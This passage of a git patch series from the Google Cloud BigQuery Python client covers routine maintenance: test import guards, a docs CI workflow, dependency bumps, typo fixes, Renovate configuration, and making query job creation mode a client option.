def test_to_arrow_w_bqstorage_no_streams(self): self.assertEqual(actual_table.schema[2].name, "colB") def test_to_arrow_progress_bar(self): + pytest.importorskip("numpy") pytest.importorskip("pyarrow") pytest.importorskip("tqdm") pytest.importorskip("tqdm.notebook") @@ -3696,6 +3709,7 @@ def test_to_dataframe_iterable_with_dtypes(self): self.assertEqual(df_2["age"][0], 33) def test_to_dataframe_iterable_w_bqstorage(self): + pytest.importorskip("numpy") pandas = pytest.importorskip("pandas") pyarrow = pytest.importorskip("pyarrow") pytest.importorskip("google.cloud.bigquery_storage") @@ -3770,6 +3784,7 @@ def test_to_dataframe_iterable_w_bqstorage(self): bqstorage_client._transport.grpc_channel.close.assert_not_called() def test_to_dataframe_iterable_w_bqstorage_max_results_warning(self): + pytest.importorskip("numpy") pandas = pytest.importorskip("pandas") pytest.importorskip("google.cloud.bigquery_storage") from google.cloud.bigquery import schema @@ -4513,7 +4528,7 @@ def test_to_dataframe_w_none_dtypes_mapper(self): def test_to_dataframe_w_unsupported_dtypes_mapper(self): pytest.importorskip("pandas") - import numpy + numpy = pytest.importorskip("numpy") from google.cloud.bigquery.schema import SchemaField schema = [ @@ -4797,6 +4812,7 @@ def test_to_dataframe_max_results_w_create_bqstorage_client_no_warning(self): mock_client._ensure_bqstorage_client.assert_not_called() def test_to_dataframe_w_bqstorage_creates_client(self): + pytest.importorskip("numpy") pytest.importorskip("pandas") pytest.importorskip("google.cloud.bigquery_storage") from google.cloud.bigquery import schema @@ -4830,6 +4846,7 @@ def test_to_dataframe_w_bqstorage_creates_client(self): bqstorage_client._transport.grpc_channel.close.assert_called_once() def test_to_dataframe_w_bqstorage_no_streams(self): + pytest.importorskip("numpy") pytest.importorskip("pandas") pytest.importorskip("google.cloud.bigquery_storage") from google.cloud.bigquery import schema @@ -4858,6 +4875,7 @@ def test_to_dataframe_w_bqstorage_no_streams(self): self.assertTrue(got.empty) def test_to_dataframe_w_bqstorage_logs_session(self): + pytest.importorskip("numpy") pytest.importorskip("google.cloud.bigquery_storage") pytest.importorskip("pandas") pytest.importorskip("pyarrow") @@ -4882,6 +4900,7 @@ def test_to_dataframe_w_bqstorage_logs_session(self): ) def test_to_dataframe_w_bqstorage_empty_streams(self): + pytest.importorskip("numpy") pytest.importorskip("google.cloud.bigquery_storage") pytest.importorskip("pandas") pyarrow = pytest.importorskip("pyarrow") @@ -4936,6 +4955,7 @@ def test_to_dataframe_w_bqstorage_empty_streams(self): self.assertTrue(got.empty) def test_to_dataframe_w_bqstorage_nonempty(self): + pytest.importorskip("numpy") pytest.importorskip("google.cloud.bigquery_storage") pytest.importorskip("pandas") pyarrow = pytest.importorskip("pyarrow") @@ -5018,6 +5038,7 @@ def test_to_dataframe_w_bqstorage_nonempty(self): bqstorage_client._transport.grpc_channel.close.assert_not_called() def test_to_dataframe_w_bqstorage_multiple_streams_return_unique_index(self): + pytest.importorskip("numpy") bigquery_storage = pytest.importorskip("google.cloud.bigquery_storage") pytest.importorskip("pandas") pyarrow = pytest.importorskip("pyarrow") @@ -5070,6 +5091,7 @@ def test_to_dataframe_w_bqstorage_multiple_streams_return_unique_index(self): self.assertTrue(got.index.is_unique) def test_to_dataframe_w_bqstorage_updates_progress_bar(self): + pytest.importorskip("numpy") bigquery_storage = pytest.importorskip("google.cloud.bigquery_storage") pytest.importorskip("pandas") pyarrow = pytest.importorskip("pyarrow") @@ -5147,6 +5169,7 @@ def blocking_to_arrow(*args, **kwargs): tqdm_mock().close.assert_called_once() def test_to_dataframe_w_bqstorage_exits_on_keyboardinterrupt(self): + pytest.importorskip("numpy") bigquery_storage = pytest.importorskip("google.cloud.bigquery_storage") pytest.importorskip("pandas") pyarrow = pytest.importorskip("pyarrow") @@ -5322,6 +5345,7 @@ def test_to_dataframe_w_bqstorage_snapshot(self): row_iterator.to_dataframe(bqstorage_client) def test_to_dataframe_concat_categorical_dtype_w_pyarrow(self): + pytest.importorskip("numpy") pytest.importorskip("google.cloud.bigquery_storage") pandas = pytest.importorskip("pandas") pyarrow = pytest.importorskip("pyarrow") @@ -5604,7 +5628,7 @@ def test_rowiterator_to_geodataframe_delegation(self, to_dataframe): """ pandas = pytest.importorskip("pandas") geopandas = pytest.importorskip("geopandas") - import numpy + numpy = pytest.importorskip("numpy") from shapely import wkt row_iterator = self._make_one_from_data( diff --git a/tests/unit/test_table_arrow.py b/tests/unit/test_table_arrow.py index 830c4ceb7..fdd1b7b78 100644 --- a/tests/unit/test_table_arrow.py +++ b/tests/unit/test_table_arrow.py @@ -18,7 +18,8 @@ import google.cloud.bigquery.table -pyarrow = pytest.importorskip("pyarrow", minversion="3.0.0") +pytest.importorskip("numpy") +pytest.importorskip("pyarrow", minversion="3.0.0") def test_to_arrow_with_jobs_query_response(): From 9b5ee78f046d9ca3f758eeca6244b8485fe35875 Mon Sep 17 00:00:00 2001 From: Dan Lee <71398022+dandhlee@users.noreply.github.com> Date: Tue, 20 May 2025 10:46:23 -0400 Subject: [PATCH 110/202] docs: update query.py (#2192) Co-authored-by: Chalmer Lowe --- google/cloud/bigquery/job/query.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index f9b99b7fb..954a46963 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -1529,7 +1529,7 @@ def result( # type: ignore # (incompatible with supertype) a DDL query, an ``_EmptyRowIterator`` instance is returned. Raises: - google.cloud.exceptions.GoogleAPICallError: + google.api_core.exceptions.GoogleAPICallError: If the job failed and retries aren't successful. concurrent.futures.TimeoutError: If the job did not complete in the given timeout. From bfa95f1469481c682e990743cc8b7025fb0facd1 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Tue, 20 May 2025 13:56:30 -0400 Subject: [PATCH 111/202] ci: adds new github workflow focused on documentation in prep to deprecate kokoro presubmit (#2194) * I've created a new workflow for the docs and docsfx nox sessions. This involves a new GitHub workflow located in `.github/workflows/docs.yml`. This new workflow will now handle running the `docs` and `docsfx` nox sessions, which were previously managed by the `.kokoro/presubmit/presubmit.cfg` workflow. Here's how the new workflow operates: - It activates when you make pull requests to the `main` branch. - It executes two jobs: `docs` and `docsfx`. - Both of these jobs utilize Python 3.10. - Each job installs nox and then runs its corresponding nox session (`docs-3.10` or `docsfx-3.10`). This adjustment is a step towards phasing out and removing the `.kokoro/presubmit/presubmit.cfg` file. * Update .github/workflows/docs.yml * Update .github/workflows/docs.yml --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> --- .github/workflows/docs.yml | 39 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 .github/workflows/docs.yml diff --git a/.github/workflows/docs.yml b/.github/workflows/docs.yml new file mode 100644 index 000000000..9372faac2 --- /dev/null +++ b/.github/workflows/docs.yml @@ -0,0 +1,39 @@ +on: + pull_request: + branches: + - main +name: docs +jobs: + docs: + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v4 + - name: Setup Python + uses: actions/setup-python@v5 + with: + python-version: '3.10' + - name: Install nox + run: | + python -m pip install --upgrade setuptools pip wheel + python -m pip install nox + - name: Run docs session + run: | + nox -s docs-3.10 + + docfx: + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v4 + - name: Setup Python + uses: actions/setup-python@v5 + with: + python-version: '3.10' + - name: Install nox + run: | + python -m pip install --upgrade setuptools pip wheel + python -m pip install nox + - name: Run docfx session + run: | + nox -s docfx-3.10 From 12490f2f03681516465fc34217dcdf57000f6fdd Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 21 May 2025 16:20:17 +0200 Subject: [PATCH 112/202] fix(deps): update all dependencies (#2184) * fix(deps): update all dependencies * Update pyproject.toml * Update .github/workflows/docs.yml * Update .github/workflows/docs.yml --------- Co-authored-by: Chalmer Lowe --- samples/desktopapp/requirements-test.txt | 2 +- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements.txt | 6 +++--- samples/magics/requirements-test.txt | 2 +- samples/magics/requirements.txt | 4 ++-- samples/notebooks/requirements-test.txt | 2 +- samples/notebooks/requirements.txt | 4 ++-- samples/snippets/requirements-test.txt | 2 +- samples/snippets/requirements.txt | 2 +- 9 files changed, 13 insertions(+), 13 deletions(-) diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index 6abea3b4d..cc71ee426 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,4 +1,4 @@ -google-cloud-testutils==1.6.2 +google-cloud-testutils==1.6.4 pytest==8.3.5 mock==5.2.0 pytest-xdist==3.6.1 diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index 743d0fe35..4a5b75346 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.32.0 +google-cloud-bigquery==3.33.0 google-auth-oauthlib==1.2.2 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 434a594cb..3b1a3ef54 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -3,7 +3,7 @@ certifi==2025.4.26 cffi==1.17.1 charset-normalizer==3.4.2 click===8.1.8; python_version == '3.9' -click==8.2.0; python_version >= '3.10' +click==8.2.1; python_version >= '3.10' click-plugins==1.1.1 cligj==0.7.2 db-dtypes==1.4.3 @@ -12,7 +12,7 @@ geojson==3.2.0 geopandas==1.0.1 google-api-core==2.24.2 google-auth==2.40.1 -google-cloud-bigquery==3.32.0 +google-cloud-bigquery==3.33.0 google-cloud-bigquery-storage==2.31.0 google-cloud-core==2.4.3 google-crc32c==1.7.1 @@ -36,7 +36,7 @@ PyYAML==6.0.2 requests==2.32.3 rsa==4.9.1 Shapely===2.0.7; python_version == '3.9' -Shapely==2.1.0; python_version >= '3.10' +Shapely==2.1.1; python_version >= '3.10' six==1.17.0 typing-extensions==4.13.2 typing-inspect==0.9.0 diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index 6abea3b4d..cc71ee426 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,4 +1,4 @@ -google-cloud-testutils==1.6.2 +google-cloud-testutils==1.6.4 pytest==8.3.5 mock==5.2.0 pytest-xdist==3.6.1 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index bb60f2a67..7d0c91e3d 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ -bigquery_magics==0.9.0 +bigquery_magics==0.10.0 db-dtypes==1.4.3 -google.cloud.bigquery==3.32.0 +google.cloud.bigquery==3.33.0 google-cloud-bigquery-storage==2.31.0 ipython===8.18.1 pandas==2.2.3 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index 6abea3b4d..cc71ee426 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,4 +1,4 @@ -google-cloud-testutils==1.6.2 +google-cloud-testutils==1.6.4 pytest==8.3.5 mock==5.2.0 pytest-xdist==3.6.1 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 17f43bf78..9f131e5b8 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,6 +1,6 @@ -bigquery-magics==0.9.0 +bigquery-magics==0.10.0 db-dtypes==1.4.3 -google-cloud-bigquery==3.32.0 +google-cloud-bigquery==3.33.0 google-cloud-bigquery-storage==2.31.0 ipython===8.18.1; python_version == '3.9' ipython==9.2.0; python_version >= '3.10' diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index 6760e1228..503324cb0 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -1,5 +1,5 @@ # samples/snippets should be runnable with no "extras" -google-cloud-testutils==1.6.2 +google-cloud-testutils==1.6.4 pytest==8.3.5 mock==5.2.0 pytest-xdist==3.6.1 diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index c31815d69..dae43eff3 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.32.0 +google-cloud-bigquery==3.33.0 From 4379b3df0f4c5e0ac1d8308500306b4ec5c99dee Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 22 May 2025 13:01:13 -0400 Subject: [PATCH 113/202] ddocs: fixes several typos and updates a try except block (#2197) --- google/cloud/bigquery/_helpers.py | 2 +- google/cloud/bigquery/_pandas_helpers.py | 2 +- google/cloud/bigquery/client.py | 2 +- google/cloud/bigquery/table.py | 4 ++-- 4 files changed, 5 insertions(+), 5 deletions(-) diff --git a/google/cloud/bigquery/_helpers.py b/google/cloud/bigquery/_helpers.py index 76c4f1fbd..c7d7705e0 100644 --- a/google/cloud/bigquery/_helpers.py +++ b/google/cloud/bigquery/_helpers.py @@ -388,7 +388,7 @@ def range_to_py(self, value, field): class DataFrameCellDataParser(CellDataParser): - """Override of CellDataParser to handle differences in expection of values in DataFrame-like outputs. + """Override of CellDataParser to handle differences in expression of values in DataFrame-like outputs. This is used to turn the output of the REST API into a pyarrow Table, emulating the serialized arrow from the BigQuery Storage Read API. diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 6691e7ef6..10a5c59bb 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -1144,7 +1144,7 @@ def determine_requested_streams( """ if preserve_order: - # If preserve order is set, it takes precendence. + # If preserve order is set, it takes precedence. # Limit the requested streams to 1, to ensure that order # is preserved) return 1 diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 8ad1586f4..067b389a5 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -4134,7 +4134,7 @@ def _list_rows_from_query_results( rows that were affected. query (Optional[str]): The query text used. - total_bytes_processed (Optinal[int]): + total_bytes_processed (Optional[int]): total bytes processed from job statistics, if present. Returns: diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 3f472c490..3b1334bd3 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -44,7 +44,7 @@ import geopandas # type: ignore except ImportError: geopandas = None -else: +finally: _COORDINATE_REFERENCE_SYSTEM = "EPSG:4326" try: @@ -1786,7 +1786,7 @@ class RowIterator(HTTPIterator): the first page is requested. query (Optional[str]): The query text used. - total_bytes_processed (Optinal[int]): + total_bytes_processed (Optional[int]): total bytes processed from job statistics, if present. """ From cc6310819290c8d3362f96c73d2373d3d4f1b44d Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 22 May 2025 16:20:44 -0400 Subject: [PATCH 114/202] ci: Remove unit tests and doc tests from kokoro presubmit. (#2195) * The message is a commit message, not a message to a user from an AI agent. Therefore, it should be output as is. Output: Remove Kokoro presubmit for unit, docs, and coverage. This commit removes the Kokoro presubmit configuration that runs `unit_noextras`, `unit`, `cover`, `docs`, and `docfx` nox sessions. These checks are already performed by GitHub Actions, making the Kokoro configuration redundant. The change involves removing the `NOX_SESSION` environment variable definition from `.kokoro/presubmit/presubmit.cfg`. * Update presubmit.cfg * Delete .kokoro/presubmit/presubmit.cfg --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> --- .kokoro/presubmit/presubmit.cfg | 7 ------- 1 file changed, 7 deletions(-) delete mode 100644 .kokoro/presubmit/presubmit.cfg diff --git a/.kokoro/presubmit/presubmit.cfg b/.kokoro/presubmit/presubmit.cfg deleted file mode 100644 index ac4cc5847..000000000 --- a/.kokoro/presubmit/presubmit.cfg +++ /dev/null @@ -1,7 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -# Disable system tests. -env_vars: { - key: "NOX_SESSION" - value: "unit_noextras unit cover docs docfx" -} From 85ff5b17e590b3c8c9b5bee64d5a69e0c01306ae Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 23 May 2025 10:25:33 -0400 Subject: [PATCH 115/202] ci: Configure Renovate to keep Python at 3.10 for docs workflow (#2199) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Configure Renovate to keep Python at 3.10 for docs workflow This change adds a packageRule to `renovate.json` to prevent Renovate from updating the Python version used in the `.github/workflows/docs.yml` GitHub Actions workflow. The rule specifically targets the `python-version` input of the `actions/setup-python` step and restricts allowed versions to `<3.11`, effectively pinning it to `3.10` for now. * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * Update renovate.json * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * adds files to excludes lists * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * Update owlbot.py * adds packageRule about pyproject.toml --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> Co-authored-by: Owl Bot --- owlbot.py | 3 ++- renovate.json | 9 ++++++++- 2 files changed, 10 insertions(+), 2 deletions(-) diff --git a/owlbot.py b/owlbot.py index 60759adbe..80cf9d6e3 100644 --- a/owlbot.py +++ b/owlbot.py @@ -65,6 +65,7 @@ templated_files, excludes=[ "noxfile.py", + "renovate.json", "docs/multiprocessing.rst", "docs/index.rst", ".coveragerc", @@ -76,7 +77,7 @@ ".kokoro/continuous/prerelease-deps.cfg", ".kokoro/samples/python3.7/**", ".kokoro/samples/python3.8/**", - ".github/workflows", # exclude gh actions as credentials are needed for tests + ".github/workflows/**", # exclude gh actions as credentials are needed for tests "README.rst", ], ) diff --git a/renovate.json b/renovate.json index c7875c469..51eb51d6e 100644 --- a/renovate.json +++ b/renovate.json @@ -8,5 +8,12 @@ "ignorePaths": [".pre-commit-config.yaml", ".kokoro/requirements.txt", "setup.py", ".github/workflows/unittest.yml"], "pip_requirements": { "fileMatch": ["requirements-test.txt", "samples/[\\S/]*constraints.txt", "samples/[\\S/]*constraints-test.txt"] - } + }, + "packageRules": [ + { + "matchFileNames": ["pyproject.toml"], + "matchStrings": ["matplotlib (.*); python_version == '3.9'"], + "allowedVersions": ">= 3.7.1, <= 3.9.2" + } + ] } From a5f98550121e033e887d2ae442b51ede13192a82 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 23 May 2025 10:57:55 -0400 Subject: [PATCH 116/202] ci: updates renovate.json to ignore docs.yml (#2200) * updates renovate to ignore docs.yml * Update renovate.json --- renovate.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/renovate.json b/renovate.json index 51eb51d6e..3ea143d4c 100644 --- a/renovate.json +++ b/renovate.json @@ -5,7 +5,7 @@ ":preserveSemverRanges", ":disableDependencyDashboard" ], - "ignorePaths": [".pre-commit-config.yaml", ".kokoro/requirements.txt", "setup.py", ".github/workflows/unittest.yml"], + "ignorePaths": [".pre-commit-config.yaml", ".kokoro/requirements.txt", "setup.py", ".github/workflows/unittest.yml", ".github/workflows/docs.yml"], "pip_requirements": { "fileMatch": ["requirements-test.txt", "samples/[\\S/]*constraints.txt", "samples/[\\S/]*constraints-test.txt"] }, From f67852d4f36c12abaca49dca5513382b36622aa0 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Fri, 23 May 2025 17:32:50 +0200 Subject: [PATCH 117/202] chore(deps): update dependency google-auth to v2.40.2 (#2196) --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 3b1a3ef54..7a0946fae 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -11,7 +11,7 @@ Fiona==1.10.1 geojson==3.2.0 geopandas==1.0.1 google-api-core==2.24.2 -google-auth==2.40.1 +google-auth==2.40.2 google-cloud-bigquery==3.33.0 google-cloud-bigquery-storage==2.31.0 google-cloud-core==2.4.3 From 28a9994792ec90a6a4d16835faf2137c09c0fb02 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Tue, 27 May 2025 04:38:22 -0500 Subject: [PATCH 118/202] docs: use query_and_wait in the array parameters sample (#2202) --- samples/client_query_w_array_params.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/samples/client_query_w_array_params.py b/samples/client_query_w_array_params.py index 25592a94a..e9d759f61 100644 --- a/samples/client_query_w_array_params.py +++ b/samples/client_query_w_array_params.py @@ -35,8 +35,8 @@ def client_query_w_array_params() -> None: bigquery.ArrayQueryParameter("states", "STRING", ["WA", "WI", "WV", "WY"]), ] ) - query_job = client.query(query, job_config=job_config) # Make an API request. + rows = client.query_and_wait(query, job_config=job_config) # Make an API request. - for row in query_job: + for row in rows: print("{}: \t{}".format(row.name, row.count)) # [END bigquery_query_params_arrays] From 64cd39fb395c4a03ef6d2ec8261e1709477b2186 Mon Sep 17 00:00:00 2001 From: shollyman Date: Tue, 27 May 2025 10:53:49 -0700 Subject: [PATCH 119/202] feat: job creation mode GA (#2190) * feat: job creation mode GA This PR makes the underlying functionality related to how queries can optionally avoid job creation a GA feature. It does the following: * no longer uses the preview QUERY_PREVIEW_ENABLED environment variable to control job creation * adds a new argument to Client instantiation to control job creation mode * adds a property/setter to Client to control job creation mode This PR also updates/renames the sample demonstrating how to leverage job creation mode with Client.query_and_wait. --- google/cloud/bigquery/_job_helpers.py | 12 ++-------- google/cloud/bigquery/client.py | 22 +++++++++++------ google/cloud/bigquery/enums.py | 19 +++++++++++++++ ...rtmode.py => client_query_job_optional.py} | 24 +++++++++++-------- ...e.py => test_client_query_job_optional.py} | 6 ++--- tests/unit/test__job_helpers.py | 12 +++++----- tests/unit/test_client.py | 11 +++++++++ 7 files changed, 70 insertions(+), 36 deletions(-) rename samples/{client_query_shortmode.py => client_query_job_optional.py} (69%) rename samples/tests/{test_client_query_shortmode.py => test_client_query_job_optional.py} (85%) diff --git a/google/cloud/bigquery/_job_helpers.py b/google/cloud/bigquery/_job_helpers.py index 4a884ada5..888dc1e73 100644 --- a/google/cloud/bigquery/_job_helpers.py +++ b/google/cloud/bigquery/_job_helpers.py @@ -37,7 +37,6 @@ import copy import functools -import os import uuid import textwrap from typing import Any, Dict, Optional, TYPE_CHECKING, Union @@ -400,12 +399,6 @@ def query_and_wait( ) -> table.RowIterator: """Run the query, wait for it to finish, and return the results. - While ``jobCreationMode=JOB_CREATION_OPTIONAL`` is in preview in the - ``jobs.query`` REST API, use the default ``jobCreationMode`` unless - the environment variable ``QUERY_PREVIEW_ENABLED=true``. After - ``jobCreationMode`` is GA, this method will always use - ``jobCreationMode=JOB_CREATION_OPTIONAL``. See: - https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query Args: client: @@ -500,9 +493,8 @@ def query_and_wait( request_body["maxResults"] = min(page_size, max_results) elif page_size is not None or max_results is not None: request_body["maxResults"] = page_size or max_results - - if os.getenv("QUERY_PREVIEW_ENABLED", "").casefold() == "true": - request_body["jobCreationMode"] = "JOB_CREATION_OPTIONAL" + if client.default_job_creation_mode: + request_body["jobCreationMode"] = client.default_job_creation_mode def do_query(): request_body["requestId"] = make_job_id() diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 067b389a5..c6873545b 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -221,6 +221,10 @@ class Client(ClientWithProject): client_options (Optional[Union[google.api_core.client_options.ClientOptions, Dict]]): Client options used to set user options on the client. API Endpoint should be set through client_options. + default_job_creation_mode (Optional[str]): + Sets the default job creation mode used by query methods such as + query_and_wait(). For lightweight queries, JOB_CREATION_OPTIONAL is + generally recommended. Raises: google.auth.exceptions.DefaultCredentialsError: @@ -243,6 +247,7 @@ def __init__( client_options: Optional[ Union[google.api_core.client_options.ClientOptions, Dict[str, Any]] ] = None, + default_job_creation_mode: Optional[str] = None, ) -> None: if client_options is None: client_options = {} @@ -277,6 +282,7 @@ def __init__( self._connection = Connection(self, **kw_args) self._location = location self._default_load_job_config = copy.deepcopy(default_load_job_config) + self.default_job_creation_mode = default_job_creation_mode # Use property setter so validation can run. self.default_query_job_config = default_query_job_config @@ -286,6 +292,15 @@ def location(self): """Default location for jobs / datasets / tables.""" return self._location + @property + def default_job_creation_mode(self): + """Default job creation mode used for query execution.""" + return self._default_job_creation_mode + + @default_job_creation_mode.setter + def default_job_creation_mode(self, value: Optional[str]): + self._default_job_creation_mode = value + @property def default_query_job_config(self) -> Optional[QueryJobConfig]: """Default ``QueryJobConfig`` or ``None``. @@ -3532,13 +3547,6 @@ def query_and_wait( ) -> RowIterator: """Run the query, wait for it to finish, and return the results. - While ``jobCreationMode=JOB_CREATION_OPTIONAL`` is in preview in the - ``jobs.query`` REST API, use the default ``jobCreationMode`` unless - the environment variable ``QUERY_PREVIEW_ENABLED=true``. After - ``jobCreationMode`` is GA, this method will always use - ``jobCreationMode=JOB_CREATION_OPTIONAL``. See: - https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query - Args: query (str): SQL query to be executed. Defaults to the standard SQL diff --git a/google/cloud/bigquery/enums.py b/google/cloud/bigquery/enums.py index 203ea3c7b..4cb7a056d 100644 --- a/google/cloud/bigquery/enums.py +++ b/google/cloud/bigquery/enums.py @@ -407,3 +407,22 @@ class BigLakeTableFormat(object): ICEBERG = "ICEBERG" """Apache Iceberg format.""" + + +class JobCreationMode(object): + """Documented values for Job Creation Mode.""" + + JOB_CREATION_MODE_UNSPECIFIED = "JOB_CREATION_MODE_UNSPECIFIED" + """Job creation mode is unspecified.""" + + JOB_CREATION_REQUIRED = "JOB_CREATION_REQUIRED" + """Job creation is always required.""" + + JOB_CREATION_OPTIONAL = "JOB_CREATION_OPTIONAL" + """Job creation is optional. + + Returning immediate results is prioritized. + BigQuery will automatically determine if a Job needs to be created. + The conditions under which BigQuery can decide to not create a Job are + subject to change. + """ diff --git a/samples/client_query_shortmode.py b/samples/client_query_job_optional.py similarity index 69% rename from samples/client_query_shortmode.py rename to samples/client_query_job_optional.py index 50446dc48..6321aea35 100644 --- a/samples/client_query_shortmode.py +++ b/samples/client_query_job_optional.py @@ -13,16 +13,18 @@ # limitations under the License. -def client_query_shortmode() -> None: - # [START bigquery_query_shortquery] - # This example demonstrates issuing a query that may be run in short query mode. - # - # To enable the short query mode preview feature, the QUERY_PREVIEW_ENABLED - # environmental variable should be set to `TRUE`. +def client_query_job_optional() -> None: + # [START bigquery_query_job_optional] + # This example demonstrates executing a query without requiring an associated + # job. from google.cloud import bigquery + from google.cloud.bigquery.enums import JobCreationMode - # Construct a BigQuery client object. - client = bigquery.Client() + # Construct a BigQuery client object, specifying that the library should + # avoid creating jobs when possible. + client = bigquery.Client( + default_job_creation_mode=JobCreationMode.JOB_CREATION_OPTIONAL + ) query = """ SELECT @@ -44,10 +46,12 @@ def client_query_shortmode() -> None: if rows.job_id is not None: print("Query was run with job state. Job ID: {}".format(rows.job_id)) else: - print("Query was run in short mode. Query ID: {}".format(rows.query_id)) + print( + "Query was run without creating a job. Query ID: {}".format(rows.query_id) + ) print("The query data:") for row in rows: # Row values can be accessed by field name or index. print("name={}, gender={}, total={}".format(row[0], row[1], row["total"])) - # [END bigquery_query_shortquery] + # [END bigquery_query_job_optional] diff --git a/samples/tests/test_client_query_shortmode.py b/samples/tests/test_client_query_job_optional.py similarity index 85% rename from samples/tests/test_client_query_shortmode.py rename to samples/tests/test_client_query_job_optional.py index 41132f24c..0e0b2cf19 100644 --- a/samples/tests/test_client_query_shortmode.py +++ b/samples/tests/test_client_query_job_optional.py @@ -1,4 +1,4 @@ -# Copyright 2024 Google LLC +# Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -14,13 +14,13 @@ import typing -from .. import client_query_shortmode +from .. import client_query_job_optional if typing.TYPE_CHECKING: import pytest def test_client_query_shortmode(capsys: "pytest.CaptureFixture[str]") -> None: - client_query_shortmode.client_query_shortmode() + client_query_job_optional.client_query_job_optional() out, err = capsys.readouterr() assert "Query was run" in out diff --git a/tests/unit/test__job_helpers.py b/tests/unit/test__job_helpers.py index 4fa093c69..417f911b8 100644 --- a/tests/unit/test__job_helpers.py +++ b/tests/unit/test__job_helpers.py @@ -554,13 +554,9 @@ def test_query_and_wait_retries_job_times_out(): ) -def test_query_and_wait_sets_job_creation_mode(monkeypatch: pytest.MonkeyPatch): - monkeypatch.setenv( - "QUERY_PREVIEW_ENABLED", - # The comparison should be case insensitive. - "TrUe", - ) +def test_query_and_wait_sets_job_creation_mode(): client = mock.create_autospec(Client) + client.default_job_creation_mode = "JOB_CREATION_OPTIONAL" client._call_api.return_value = { "jobReference": { "projectId": "response-project", @@ -642,6 +638,7 @@ def test_query_and_wait_sets_location(): "useInt64Timestamp": True, }, "requestId": mock.ANY, + "jobCreationMode": mock.ANY, }, timeout=None, ) @@ -658,6 +655,7 @@ def test_query_and_wait_sets_location(): ) def test_query_and_wait_sets_max_results(max_results, page_size, expected): client = mock.create_autospec(Client) + client.default_job_creation_mode = None client._call_api.return_value = { "jobReference": { "projectId": "response-project", @@ -703,6 +701,7 @@ def test_query_and_wait_sets_max_results(max_results, page_size, expected): def test_query_and_wait_caches_completed_query_results_one_page(): client = mock.create_autospec(Client) + client.default_job_creation_mode = None 